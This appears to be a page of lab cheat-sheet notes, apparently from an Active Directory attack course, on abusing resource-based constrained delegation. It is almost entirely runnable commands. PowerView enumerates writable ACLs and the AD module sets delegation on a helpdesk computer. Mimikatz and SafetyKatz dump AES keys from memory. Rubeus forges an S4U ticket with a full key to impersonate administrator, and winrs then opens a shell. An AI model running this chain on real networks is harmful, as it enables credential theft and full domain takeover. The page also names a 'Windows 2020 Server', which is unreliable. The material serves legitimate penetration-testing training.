RBCD -

PowerShell

Enumerate if we have Write permissions over any object

# PowerView
Find-InterestingDomainAcl | ?{$_.identityreferencename -match 'mgmtadmin'}

Configure RBCD on us-helpdesk for student machines

# AD Module
$comps = 'student1$','student2$'
Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps

We we can dump the AES Keys of the Students

# Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

# SafetyKatz Binary
SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"

# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe -Command "sekurlsa::ekeys" "exit"

Binaries

Rubeus

Use the AES key of studentx$ with Rubeus and access us-helpdesk as ANY user we want

Rubeus.exe s4u /user:student1$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt

Winrs

Now we can connect to the session

winrs -r:us-helpdesk cmd.exe

Last updated

Was this helpful?